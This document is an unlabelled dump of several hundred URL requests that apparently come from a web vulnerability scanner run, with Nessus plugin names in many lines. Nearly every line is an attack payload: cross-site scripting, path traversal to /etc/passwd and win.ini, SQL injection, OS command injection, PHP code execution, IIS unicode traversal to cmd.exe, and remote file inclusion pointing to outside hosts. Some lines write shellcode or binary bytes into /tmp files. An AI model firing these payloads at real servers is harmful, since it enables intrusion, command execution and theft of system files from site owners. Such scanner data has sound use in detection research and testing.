src=http://www.example.com/test?rnd=q92694241></script>\n../../../../../../../etc/passwd\n/scripts/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/cacti/fxm.exe\n/s7qus4g3.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ywaxntrx.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/lce0cbkfb8xx.sh\n<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/vhscript-0/\n/javascript/.htaccess/\"`true`\"\n/vwmg565s.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/esmozg5d.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/q703m78q.cfc?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/cgi-bin/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/javascript/up.exe\nftp://192.168.21.253/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/en-us/esmozg5d.asp?<script>cross_site_scripting.nasl</script>\n/sendtemp.pl?templ=../../../../../etc/passwd\n/phpmyadmin/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/snakesandrubiestranscript/\n/pxagj7n7.nsf?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/latestvirusdescriptions/\n/cgi-914/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/scripts/gdxlwjnlsr6i.html\n/javascript/sitemap.exe\n/6wb70v0b.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/oie504mr.pl?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/en-us/static/@95063:81/app/launcher/scripts/tabify.js?_=1331994897912\n/en-us/oie504mr.php?<script>document.cookie=\"testtpby=7052;\"</script>\n/6qbynt4f.exe?<script>cross_site_scripting.nasl</script>\n/script_path/config.inc.php?_path=http://192.168.202.96:8080/swgnhpydbq0t??\n/33y9gcqq.idc?<script>document.cookie=\"testnvxc=4301;\"</script>\n/phpmyadmin/lang/lang.php?lang_path=/etc/passwd\\x00\n/fpnpp5zg.php?<script>document.cookie=\"testyias=101;\"</script>\n/h5sc3gxy.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/rx9ysf2iwv4j.shtml\n/main.php?stuff=\"&rm\\xa0q39243847&rem\\xa0\n/gy23xnjq.cfc?<script>cross_site_scripting.nasl</script>\n/b1q8bywu.aspx?<script>cross_site_scripting.nasl</script>\n/1r8cfrlf.mscgi?<script>document.cookie=\"testydan=5106;\"</script>\n/1qwv2p5p.nsf?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/examples/jsp/jsp2/el/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/news_scripts/\n/examples/jsp/sessions/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/de3v2dd9.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/append.exe\n/examples/jsp/checkbox/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/help.php?q=\"&rm\\x09q13287114\\x09#\n/javascript/shopping.exe\n/zln2hm2z.cgi?<script>document.cookie=\"testblcp=8120;\"</script>\n/examples/jsp/error/index.php?templates_dir=/etc/passwd\\x00\n/javascript/document.conf\n/help.php?q=\"&del\\xa0q59981564&rem\\xa0\n/phpmyadmin/more.php?id=1'\n/j4rdyhw8.jsp?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/javascript/manual.exe\n/rpxyx07v.nsf?<meta http-equiv=set-cookie content=\"testbnli=1975\">\n/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>\n/path_script/createurl.php?formurl=http://192.168.202.96:8080/frznctvhi0i5?\n/de3v2dd9.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/udblphlq4nln.pl\n/subscriptions.class\n/news.php?config[script_path]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/jsp2/jspxsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/ script>alert document.secin.password.value  /script>\n/examples/servlets/servlet/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/u8yiqilu.php3?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/examples/jsp/error/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/raanw4ia.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"\\x0drm q75726259 #\n/towels-0.1/src/scripture.php?pageheaderfile=http://cirt.net/rfiinc.txt?\n/examples/jsp/colors/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/h4bi26jd.asp?<script>document.cookie=\"testhrzx=1150;\"</script>\n/admin/admin.php?sid='\n/examples/jsp/num/sources/functions.php?root_path=/etc/passwd\\x00\n/main.php?stuff=ver\\x0b>q55597274&rem\\x0b\n/forum1.asp?n=1753&amp;nn=/etc/passwd\\x00\n/subscriptions.swf\n/javascript/government.exe\n/cgi/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/cfscript/\n/main.php?logout=\"&del q63418787&rem \n/\"<script>alert(\"xss\")</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/&frm_user=&scr_height=q78911548&scr_width=\n/main.php?stuff=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/g3w7y7u5.nsf?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+\\x00\\\"><script>alert('vulnerable')</script>\n/javascript/on.exe\n/examples/jsp/error/sawmill6cl.exe?ho+{complete_version}\n/cgi-win/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/ybz5rz7a.dll?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/remindpasswd/\n/uvazfs7p.mscgi?<meta http-equiv=set-cookie content=\"testwtbo=4831\">\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331908852\n/javascript/jpa.exe\n/?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/javascript/document.so\n/nuh3zirz.jsp?<script>cross_site_scripting.nasl</script>\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.html\n/javascript/.passwd.bak\n/filedetails.php?path=</title><script>alert(414215590327)</script>\n/javascript/asdf.exe\n/l4fz1dqw.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/digital-subscriptions/\n/javascript/document.jsf\n/sportsman's/\n/yef5f3d5.htm?<script>document.cookie=\"testcrcv=6167;\"</script>\n/examples/jsp/jsp2/el/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/top.php?stuff=\"|ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/my sister's hot friend - eve vivian/\n/tvcs/getservers.exe?action=selects1\n/javascript/cpanel.exe\n/33y9gcqq.aspx?<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/main.php?logout=1' and 1=1 and ''<>'kxshru8u\n/javascript/htpasswd.meta\n/examples/jsp/jsp2/el/index.php?user_langue=../../../../../../../../../../etc/passwd\n/help.php?q=\"ver;>q43131815&rem;\n/fc9t54l7.htm?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/examples/jsp/jsp2/el/cal_make.pl?p0=../../../../../../../../../etc/passwd\\x00\n/<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/support/common.php?f=0&forumlang=../../../../../../../../../../etc/passwd\n/606wkcop.cfc?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?entry='\n/main.php?logout='\\x0duname\\x09#\n/javascript/traffic.exe\n/nyvbv05h.cfc?<script>document.cookie=\"testftxz=5980;\"</script>\n/examples/jsp/colors/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/javascript/devices.exe\n/7u1pb2xi.exe?<meta http-equiv=set-cookie content=\"testlwwz=718\">\n/scripts/admin/login/index.php\n/scripts/login.pl\n/xsqln7eb.dll?<script>document.cookie=\"testpcbb=9254;\"</script>\n/cgis/r.cgi?file=../../../../../../../../../../etc/passwd\n/help.php?q=\"&sleep 11 #\n/en-us/hipkz026.htm?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/main.php?logout=\";del\\x09q14876269\\x09#\n/note.txt?f_notini=&t_note=&nomentreprise=blah&filenote=../../winnt/win.ini\n/en-us/account/detail.asp?nchannel='1\n/javascript/resin.exe\n/javascript/left.exe\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://cirt.net/rfiinc.txt??\n/scripts/apgafvcxoeeh.php\n/scripts-df/\n/script/init/createallimagecache.php?path_to_code=http://192.168.202.118:8080/2aibfaczmac8?\n/cacti/texis.exe/?-dump\n/imprimer.asp?no=/....../boot.ini|44|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;/&#039;.\n/scripts/login.jsp?lang=en&cntry=\n/jnv890lt.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/show_post.exe\n/examples/servlets/servlet/shoutbox.php?conf=../../../../../../../../etc/passwd\n/scripts/4rzefq7dsowk.sh\n/examples/servlets/servlet/demos/demo.browse.php?filename=/etc/passwd\n/en-us/i686v90l.mscgi?<script>document.cookie=\"testfutf=1550;\"</script>\n/path_script/createurl.php?formurl=http://192.168.202.118:8080/iroy1gvqrrqu?\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/tvwonjvwux.sh').\"]=1\n/tuwjta1w.fts?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/i686v90l.jsp?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/manager/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/examples/jsp/cal/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd\n/index.php?version=\"><script>alert('force_xss')</script>\n/help.php?q=&ver;>q15387485&rem;\n/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/main.php?stuff=ping;-w;7000;-n;1;4.3.2.1&rem;\n/top.php?stuff=@'\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/javascript/.htpasswd.sfish/'`true`'\n/scripts/mlog.html?screen=/etc/passwd\n/cgi-bin/webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\\x00\n/rpxyx07v.exe?<script>document.cookie=\"testbnli=1975;\"</script>\n/examples/servlets/servlet/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/recordings/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/jujgxwav.fts?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/examples/jsp/sessions/hw3.cgi?daysonly=0).system('id').(\n/ldap/cgi-bin/ldacgi.exe?action=substitute&template=../../../../../boot.ini&sub=localepath&localepath=enus1252\n/javascript/share.exe\n/qczkquis.kspx?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/manager/index.php?chemin=../../../../../../..//etc\n/student.asp?msg=<script>alert(\"411715577541\");</script>\n/jnt3f86c.idc?<script>document.cookie=\"testcmax=9270;\"</script>\n/fmnveedu.exe?<script>document.cookie=\"testgfbr=7014;\"</script>\n/3m5knyc4.idc?<script>document.cookie=\"testbgqj=6434;\"</script>\n/examples/jsp/error/admin/top.php?admindir=/etc/passwd\\x00\n/../../../../../../../../../boot.ini\n/en-us/account/search.pl?form=../../../../../../etc/passwd\\x00\n/rmscript/\n/en-us/9kr0ih0v.cfc?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/en-us/account/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/phpmyadmin/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/vtc flash  actionscript 2/\n/examples/jsp/cal/zpanel.php?page=/etc/passwd\\x00\n/main.php?stuff=\"&sleep\\x098\\x09#\n/htpasswd\n/shop/member_html.cgi?file=|cat /etc/passwd|\n/javascript/membership.exe\n/examples/jsp/jsp2/jspx/way-board/way-board.cgi?db=/etc/passwd\\x00\n/javascript/nav.exe\n/examples/jsp/checkbox/index.php?search=<script>foo</script>\n/cgibin/cgi-test.exe\n/en-us/account/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/scs86g1p.php3?<script>document.cookie=\"testquyx=2820;\"</script>\n/bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/examples/jsp/cal/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/qb2xy9aw.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/scripts/shop.plx\n/member/usercp_menu.php?script_folder=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/checkbox/sendcard.php?view=1&id='sendcard_sql.nasl\n/scripts/vvh_tajyleqq.php3\n/hjdzm96v.pl?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/r3le3om5.nsf?<script>cross_site_scripting.nasl</script>\n/scripts/qg9h0c0svvat.asp\n/examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/help.php?q=\"&sleep 7 #\n/phpmyadmin/story.pl?next=../../../../../etc/passwd\\x00\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/manager/index.php?post=../config/password\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/lknajdyaas;\"\n/j2kdmfw4.jspa?<script>cross_site_scripting.nasl</script>\n/javascript/img.exe\n/top.php?stuff='&del\\x09q46445966\\x09#\n/javascript/bash.exe\n/cgi/msmmask.exe?mask=/junk334\n//</p><body><script src=http://www.example.com/test?rnd=q56966629></script><p>\n/quagynka.jspa?<script>cross_site_scripting.nasl</script>\n/recordings/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/en-us/h5sc3gxy.mscgi?<script>cross_site_scripting.nasl</script>\n/scripts/sendtemp.pl?templ=../../../../../etc/passwd\n/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/en-us/account/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/vmi8bb12.cfm?<script>document.cookie=\"testlerc=2575;\"</script>\n/oie504mr.php?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/examples/jsp/checkbox/file.php?path=/etc/passwd\\x00\n/scripts/callboth.php?seq=654321&out=123456&in=1331908731@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/1qwv2p5p.x?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/hrttz9fj.kspx?<script>document.cookie=\"testtbjy=7334;\"</script>\n/phpmyadmin/shoutbox.php?conf=../../../../../../../../etc/passwd\n/scripts/disp_album.php?id_album=0+or+1=1\n/javascript/document.as\n/g3w7y7u5.cfm?<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/servlets/servlet/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\\x00\n/news/include/createdb.php?langfile;=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/dagent/checkprofile.asp?agentid=11111'plus_agentid_sql_injection.nasl\n/ddoworrl.php3?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/eg2u8pbv.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin//.../.../.../.../.../.../.../.../windows/win.ini\n/scripts/doc/index.php?s=/etc/passwd\\x00\n/scripts/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q=';uname\\x09>q69988199\\x09#\n/scripts/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1332008329',null,null,null,null --\n/main.php?stuff=\"&ver\\x0b>q12538123&rem\\x0b\n/scripts/2sfdqydfaknx.php\n/freescripts/\n/cgi-bin/detail.asp?nchannel='1\n/nyvbv05h.jsp?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/braincodec.121.exe/\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0334\\0047\\0211\\0340j\\0020pr\" >> /tmp/yzicxmyifv0;echo|awstats634921.txt\n/cgi-bin/search.php?submit=true&search=');\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../vtigerservice.php\\x00\n/fmnveedu.cfm?<script>document.cookie=\"testgfbr=7014;\"</script>\n/javascript/unregister.exe\n/index.php?news7[\"functions\"]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/buck_o'neil/\n/6wb70v0b.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+00+50+45+00+00+4c+01+03+00+00+00+00+00+00+00+00+00+00+00+00++>>ctdn\n/examples/servlets/servlet/?mod=read&id=../../../../../../../../../../../../../etc/passwd\\x00\n/<script>alert('vulnerable')</script>.shtm\n/en-us/esmozg5d.jspa?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,169866100570,4,5,6,7,8,9,10,11--\n/cgi/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/scripts/sawmill?rfcf+\"sawmillinfo/sawmillpassword\"+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3\n/index.php?config[\\\"sipssys\\\"]=http://cirt.net/rfiinc.txt?\n/examples/jsp/jsp2/jspx/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/<script>cross_site_scripting.nasl</script>.jsp\n/ywaxntrx.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/using logon scripts figure 81102332930350/\n/melscript/\n/examples/jsp/colors/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/main.php?logout=\"|ping,-w,8000,-n,1,4.3.2.1|rem,\n/o6ebbirj.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ver&rem;\n/gvx7m5ti.php?<script>document.cookie=\"testwldz=3506;\"</script>\n/top.php?stuff=\\x0duname\\x09>q27119174\\x09#\n/javascript/ru.exe\n/en-us/account/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/en-us/manager/search/apps/local?msgid=4457640.337874593665&amp;ns=search&amp;redirecting=true\n/scripts/b2-tools/gm-2-b2.php?b2inc=http://xxxxxxxx\n/main.php?logout='\\x0arm q82997141 #\n/main.php?logout='\\x0ddel q29695698 #\n/cgi-bin/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/1r8cfrlf.x?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/main.php?logout=\"&uname\\x09#\n/en-us/dda2qr7j.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/exchange/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/crontabs.exe\n/help.php?q='|sleep\\x0910\\x09#\n/l4fz1dqw.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/qbch5ojumj32.sh\n/help.php?q='\\x0ddel q95327467 #\n/scripting2weblogscom/\n/ap58k3ci.jspa?<script>cross_site_scripting.nasl</script>\n/666\\x0a\\x0a<script>alert('vulnerable');</script>666.jsp\n/main.php?stuff='\\x0auname >q75819271 #\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd\n/javascript/include.exe\n/cgi-bin/main.cgi?board=free_board&command=down_load&filenikto=../../../../../../../../../../etc/passwd\n/t3af3tdz.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgibin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1332008331\n/help.php?q=\"\\x0ddel q43695626 #\n/yver8r9o.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mv8wxfy9.idc?<script>document.cookie=\"testrhbc=8184;\"</script>\n/manager/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h\n/top.php?stuff='\\x0duname\\x09#\n/examples/servlets/servlet/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd\n/main.php?stuff=\"\\x0dsleep\\x098\\x09#\n/jnt3f86c.asp?<script>document.cookie=\"testcmax=9270;\"</script>\n/zqqemp6j.asp?<script>cross_site_scripting.nasl</script>\n/<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/servlets/servlet/config.php?path[docroot]=/etc/passwd\\x00\n/index.php?cat='\n/main.php?logout=\"ping -w 8000 -n 1 4.3.2.1|rem \n/scriptpad/\n/jackrabbit/search.jsp?q=%\"<script>alert(1331909235)</script>\n/javascript/cms.exe\n/?<script>document.cookie=\"testbyqe=7474;\"</script>\n/gulliver's_travels/\n/search.php?config[\"sipssys\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/jsp2/el/edit.jsp?page=user&editor=../../../install\n/yef5f3d5.mscgi?<script>document.cookie=\"testcrcv=6167;\"</script>\n/xfkun1ku.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=<?php passthru('id'); die; ?>\n/examples/jsp/colors/nslookup.cgi?query=localhost;id&type=any&ns=\n/j4drbkil.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-915/.passwd\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908691&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/yef5f3d5.pl?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/manager/misc/audio.php?recording=../version.inc\n/javascript/finance.exe\n/egaet53a.php?<script>cross_site_scripting.nasl</script>\n/subscriptions.tmp\n/javascript/broken.exe\n/javascript/document.properties\n/examples/jsp/checkbox/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\\x00\n/dslpwt15.pl?<script>document.cookie=\"testtkio=5454;\"</script>\n/javascript/.passwd.mdb\n/b1q8bywu.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscription_signup/\n/examples/jsp/cal/faq.php?action=&type=view&s=&id=-1' union select 0,576895199,0,0,0,0,0--\n/yef5f3d5.html?<script>document.cookie=\"testcrcv=6167;\"</script>\n/help.php?q=;rm q88998669 #\n/webcgi/texis.exe/junk\n/scripts/onwkbtts3uj1.html\n/examples/jsp/jsp2/jspx/file.php?path=/etc/passwd\\x00\n/pii.exe\n/main.php?frm_daynight=day&frm_passwd=q16254778&frm_referer=http%3a//192.168.24.202/main.php%3flogout%3d1&frm_user=&scr_height=&scr_width=\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331905123',null,null,null,null --\n/main.php?logout=&uname >q77917557 #\n/zuihld5m.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/snpfiltered.pl?t=c&u=<script>foo</script>\n/ttxssh2_212/\n/main.php?stuff=\"\\x0asleep 7 #\n/examples/jsp/cal/sawmill6cl.exe?ho+{complete_version}\n/gy23xnjq.dll?<script>cross_site_scripting.nasl</script>\nhttp://xxxxxxxxxxx.:80/<script>alert('vulnerable')</script>.jsp\n/manager/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/en-us/33y9gcqq.html?<script>document.cookie=\"testnvxc=4301;\"</script>\n/phpmyadmin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/tuwjta1w.nsf?<script>document.cookie=\"testpokn=7494;\"</script>\n/top.php?stuff=\\x0duname >q78785137 #\n/help.php?q=&ping;-w;9000;-n;1;4.3.2.1&rem;\n/javascript/htpasswd.asmx\n/yver8r9o.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,473248912,0,0,0,0,0--\n/scripts/bveygnpo6hkw.inc\n/cgi-bin/shopper.cgi?newpage=../../../../../../etc/passwd\n/cgi-bin/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/l4fz1dqw.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/recordings/sendtemp.pl?templ=../../../../../etc/passwd\n/j4rdyhw8.htm?<meta http-equiv=set-cookie content=\"testrluj=1420\">\n/scriptinga/\n/examples/jsp/sessions/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/javascript/web-beans.exe\n/phpmyadmin//..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c/windows/win.ini\n/dda2qr7j.do?<script>cross_site_scripting.nasl</script>\n/bn857frh.idc?<script>cross_site_scripting.nasl</script>\n/javascript/saml.exe\n/scripts/.passwd\n/iissamples/sdk/asp/docs/winmsdp.exe\n/en-us/<script>document.cookie=\"testzgnm=1183;\"</script>\n/tamambolo_scriptautomatikpourprocdump321-5/\n/javascript/6.exe\n/scripts/buoalakxhatu.php\n/d7ktpmcq.exe?<script>cross_site_scripting.nasl</script>\n<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/main.php?stuff=\"ping,-w,11000,-n,1,1.2.3.4|rem,\n/scripts/docman/new.php\n/msadc/..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/fpnpp5zg.aspx?<script>document.cookie=\"testyias=101;\"</script>\n/scripts/udblphlq4nln.asp\n/tuwjta1w.do?<meta http-equiv=set-cookie content=\"testpokn=7494\">\n/webcgi/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/examples/jsp/jsp2/jspx/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_na5kufvl]));die;/*\n/main.php?stuff=\"&rm\\x09q48424932&rem\\x09\n/running scripts at login/\n/recordings/main.php?g2_itemid=../../../../../license\\x00\n/ddoworrl.cfc?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/main.php?logout='uname\\x09#\n/qhvu0pdg.php3?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/examples/jsp/jsp2/jspx/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/scripts/lpzj75ztw9lb.cfm\n/l13b77e5.dll?<script>document.cookie=\"testjvvf=7721;\"</script>\n/www/delivery/ac.php?bannerid=-1331919146+or+1=1+--+';passthru(base64_decode($_server[http_nessus_5r89tpqc]));die;/*\n/hrttz9fj.pl?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/9o6g5vkn.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/lsoix5h3.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"|sleep 8 #\n/nsn/..\\util/rd.bas\n/main.php?stuff=\"\\x0adel\\x09q72429699\\x09#\n/cim-description/\n/en-us/w4996nr0.dll?<script>document.cookie=\"testttvs=7163;\"</script>\n/hipkz026.cgi?<script>document.cookie=\"testyrbs=2855;\"</script>\n/examples/jsp/jsp2/el/index.php?gadget=../../../../../../etc/passwd\\x00&path=/etc\n/javascript/folder.exe\n/cgi-bin/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/icon_transcript/\n/scripts/loadpage.cgi\n/en-us/odzk29aa.pl?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/en-us/dda2qr7j.x?<script>cross_site_scripting.nasl</script>\n/cacti/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://192.168.202.118:8080/ghl9il?\n/examples/jsp/security/protected/j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61712365427.copy\n/javascript/dealer.exe\n/6dlc2zm9.fts?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/subscriptions.dat\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.118:8080/ghl9il?\n/2 girls with dildo's 